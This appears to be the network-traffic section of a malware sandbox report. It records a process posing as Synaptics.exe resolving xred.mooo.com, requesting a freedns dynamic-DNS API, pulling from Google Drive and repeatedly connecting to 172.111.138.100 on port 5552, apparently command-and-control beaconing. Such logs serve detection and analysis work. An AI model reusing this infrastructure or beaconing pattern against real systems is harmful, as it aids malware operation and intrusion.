                                                                                                                      Dec 30, 2024 11:34:30.582391977 CET44349718142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.582534075 CET49718443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:30.582870007 CET49718443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:30.582882881 CET44349718142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.593873024 CET49719443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:30.593936920 CET44349719142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.593997955 CET49719443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:30.594266891 CET49719443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:30.594283104 CET44349719142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.991075039 CET804971569.42.215.252192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.992449045 CET4971580192.168.2.869.42.215.252
                                                                                                                      Dec 30, 2024 11:34:31.175147057 CET44349716172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.175534964 CET49716443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.176453114 CET44349717172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.176557064 CET49717443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.186758995 CET44349718142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.186861992 CET49718443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.213861942 CET44349719142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.213944912 CET49719443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.287116051 CET49719443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.287153959 CET44349719142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.287564993 CET44349719142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.287744999 CET49719443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.292331934 CET49718443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.292357922 CET44349718142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.292668104 CET44349718142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.292733908 CET49718443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.292875051 CET49719443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.293409109 CET49718443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.335340023 CET44349719142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.339348078 CET44349718142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.429946899 CET49716443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.429975033 CET44349716172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.431515932 CET49717443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.431535006 CET44349717172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.432518005 CET49716443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.432524920 CET44349716172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.433562040 CET49717443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.433568954 CET44349717172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.627727985 CET44349718142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.627783060 CET44349718142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.627850056 CET49718443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.627868891 CET44349718142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.627904892 CET44349718142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.627937078 CET49718443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.638708115 CET49718443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.638731956 CET44349718142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.719129086 CET44349716172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.719257116 CET49716443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.719283104 CET44349716172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.719397068 CET49716443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.719415903 CET44349717172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.719456911 CET49716443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.719485044 CET49717443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.719497919 CET44349716172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.719584942 CET49716443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.719695091 CET49717443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.719746113 CET44349717172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.719824076 CET49717443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.720303059 CET49721443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.720345974 CET44349721142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.720449924 CET49721443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.772586107 CET44349719142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.772644043 CET44349719142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.772655964 CET49719443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.772684097 CET44349719142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.772696018 CET49719443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.772772074 CET44349719142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.772824049 CET49719443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.946806908 CET49723443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.946870089 CET44349723172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.946930885 CET49723443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.947760105 CET49719443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.947793007 CET44349719142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.948709965 CET49723443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.948724985 CET44349723172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.954930067 CET49721443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.954956055 CET44349721142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.955419064 CET49724443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.955449104 CET44349724172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.955540895 CET49724443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.956108093 CET49724443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:31.956124067 CET44349724172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.956763029 CET49725443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.956789970 CET44349725142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:31.956892014 CET49725443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.957515001 CET49725443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:31.957528114 CET44349725142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:32.373693943 CET497275552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:32.378513098 CET555249727172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:32.378619909 CET497275552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:32.378978014 CET497275552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:32.391608000 CET555249727172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:32.555114985 CET44349721142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:32.555179119 CET49721443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:32.555802107 CET44349723172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:32.555871964 CET49723443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:32.556559086 CET44349723172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:32.556612968 CET49723443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:32.564723969 CET44349725142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:32.564817905 CET49725443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:32.574251890 CET44349724172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:32.574357986 CET49724443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:32.575203896 CET44349724172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:32.575253010 CET49724443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:36.757107973 CET555249727172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:36.759012938 CET497275552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:36.971111059 CET497275552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:36.975971937 CET555249727172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.297689915 CET49725443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:38.297712088 CET44349725142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.297938108 CET49721443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:38.297955990 CET44349721142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.302756071 CET49721443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:38.302773952 CET44349721142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.304138899 CET49725443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:38.304173946 CET44349725142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.307657957 CET49723443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:38.307687044 CET44349723172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.308090925 CET44349723172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.310462952 CET49723443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:38.312124014 CET49723443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:38.321403027 CET49724443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:38.321434975 CET44349724172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.321784973 CET44349724172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.321862936 CET49724443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:38.322882891 CET49724443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:38.355340958 CET44349723172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.363337040 CET44349724172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.590842962 CET44349723172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.590929031 CET49723443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:38.590965986 CET44349723172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.591037989 CET49723443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:38.591842890 CET44349723172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.591892958 CET44349723172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.591918945 CET49723443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:38.591989994 CET49723443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:38.619260073 CET44349724172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.619343042 CET49724443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:38.619369984 CET44349724172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.619682074 CET49724443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:38.620536089 CET44349724172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.620574951 CET44349724172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.620605946 CET49724443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:38.620656967 CET49724443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:38.639085054 CET44349721142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.639136076 CET44349721142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.639164925 CET49721443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:38.639194965 CET44349721142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.639223099 CET49721443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:38.639245033 CET44349721142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.639642954 CET49721443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:38.792079926 CET44349725142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.792139053 CET44349725142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.792170048 CET49725443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:38.792184114 CET44349725142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.792212009 CET49725443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:38.792260885 CET44349725142.250.185.193192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:38.792296886 CET49725443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:38.792555094 CET49725443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:41.212524891 CET49723443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:41.212557077 CET44349723172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:41.212703943 CET49724443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:41.212743998 CET44349724172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:41.456415892 CET497405552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:41.461330891 CET555249740172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:41.461431980 CET497405552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:41.461796045 CET497405552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:41.466593027 CET555249740172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:43.394270897 CET49721443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:43.394315004 CET4971580192.168.2.869.42.215.252
                                                                                                                      Dec 30, 2024 11:34:43.394464016 CET49725443192.168.2.8142.250.185.193
                                                                                                                      Dec 30, 2024 11:34:43.975420952 CET555249740172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:43.975548029 CET497405552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:43.996619940 CET497405552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:44.001621008 CET555249740172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:50.549892902 CET497425552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:50.555013895 CET555249742172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:50.555438995 CET497425552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:50.555737972 CET497425552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:50.560600042 CET555249742172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:57.930707932 CET555249742172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:57.934731007 CET497425552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:57.947597980 CET497425552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:57.952481031 CET555249742172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:59.570019007 CET497435552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:59.575109005 CET555249743172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:59.575191021 CET497435552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:59.575488091 CET497435552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:34:59.580393076 CET555249743172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:01.718347073 CET555249743172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:01.718436956 CET497435552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:01.758933067 CET497435552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:01.763838053 CET555249743172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:08.609107018 CET497445552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:08.614136934 CET555249744172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:08.614459038 CET497445552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:08.620830059 CET497445552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:08.625722885 CET555249744172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:12.979609013 CET555249744172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:12.979788065 CET497445552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:13.009566069 CET497445552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:13.014431953 CET555249744172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:17.674894094 CET497465552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:17.679881096 CET555249746172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:17.680093050 CET497465552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:17.680423975 CET497465552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:17.685219049 CET555249746172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:20.195430994 CET555249746172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:20.195491076 CET497465552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:20.242933989 CET497465552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:20.247793913 CET555249746172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:26.759160995 CET497475552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:26.764102936 CET555249747172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:26.764437914 CET497475552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:26.770725012 CET497475552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:26.775641918 CET555249747172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:28.901511908 CET555249747172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:28.901580095 CET497475552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:28.946635008 CET497475552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:28.951390028 CET555249747172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:35.878783941 CET497495552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:35.883836031 CET555249749172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:35.884424925 CET497495552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:35.884800911 CET497495552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:35.889565945 CET555249749172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:43.244992018 CET555249749172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:43.245054960 CET497495552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:43.305732012 CET497495552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:43.310664892 CET555249749172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:44.888179064 CET497525552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:44.893074036 CET555249752172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:44.893183947 CET497525552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:44.894680023 CET497525552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:44.899436951 CET555249752172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:47.102834940 CET555249752172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:47.106796026 CET497525552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:47.119904995 CET497525552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:47.124695063 CET555249752172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:53.896313906 CET497535552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:53.901166916 CET555249753172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:53.901271105 CET497535552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:53.901669025 CET497535552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:53.906449080 CET555249753172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:58.281898022 CET555249753172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:35:58.282021999 CET497535552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:58.291224003 CET497535552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:35:58.296061993 CET555249753172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:36:02.961065054 CET497545552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:36:02.966006041 CET555249754172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:36:02.968503952 CET497545552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:36:02.973448992 CET497545552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:36:02.978257895 CET555249754172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:36:05.507683039 CET555249754172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:36:05.507795095 CET497545552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:36:05.582288027 CET497545552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:36:05.587199926 CET555249754172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:36:11.988013983 CET497555552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:36:11.992942095 CET555249755172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:36:11.993031025 CET497555552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:36:11.993455887 CET497555552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:36:11.998225927 CET555249755172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:36:14.161577940 CET555249755172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:36:14.161669016 CET497555552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:36:14.182061911 CET497555552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:36:14.186853886 CET555249755172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:36:21.065911055 CET497565552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:36:21.070867062 CET555249756172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:36:21.070951939 CET497565552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:36:21.071387053 CET497565552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:36:21.076128960 CET555249756172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:36:23.222141981 CET555249756172.111.138.100192.168.2.8
                                                                                                                      Dec 30, 2024 11:36:23.222889900 CET497565552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:36:23.560424089 CET497565552192.168.2.8172.111.138.100
                                                                                                                      Dec 30, 2024 11:36:23.565258980 CET555249756172.111.138.100192.168.2.8
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 30, 2024 11:34:29.517596006 CET5502453192.168.2.81.1.1.1
                                                                                                                      Dec 30, 2024 11:34:29.524151087 CET53550241.1.1.1192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.383749962 CET6374153192.168.2.81.1.1.1
                                                                                                                      Dec 30, 2024 11:34:30.391242981 CET53637411.1.1.1192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.394274950 CET5171353192.168.2.81.1.1.1
                                                                                                                      Dec 30, 2024 11:34:30.402133942 CET53517131.1.1.1192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.573944092 CET6277653192.168.2.81.1.1.1
                                                                                                                      Dec 30, 2024 11:34:30.581588030 CET53627761.1.1.1192.168.2.8
                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Dec 30, 2024 11:34:29.517596006 CET192.168.2.81.1.1.10xbd50Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:34:30.383749962 CET192.168.2.81.1.1.10x180aStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:34:30.394274950 CET192.168.2.81.1.1.10x885fStandard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:34:30.573944092 CET192.168.2.81.1.1.10xea44Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Dec 30, 2024 11:34:29.524151087 CET1.1.1.1192.168.2.80xbd50No error (0)docs.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:34:30.391242981 CET1.1.1.1192.168.2.80x180aName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:34:30.402133942 CET1.1.1.1192.168.2.80x885fNo error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:34:30.581588030 CET1.1.1.1192.168.2.80xea44No error (0)drive.usercontent.google.com142.250.185.193A (IP address)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:35:31.694185019 CET1.1.1.1192.168.2.80xb247No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 30, 2024 11:35:31.694185019 CET1.1.1.1192.168.2.80xb247No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                      • docs.google.com
                                                                                                                      • drive.usercontent.google.com
                                                                                                                      • freedns.afraid.org
                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.84971569.42.215.252808036C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 30, 2024 11:34:30.408147097 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                      User-Agent: MyApp
                                                                                                                      Host: freedns.afraid.org
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Dec 30, 2024 11:34:30.991075039 CET243INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Mon, 30 Dec 2024 10:34:30 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
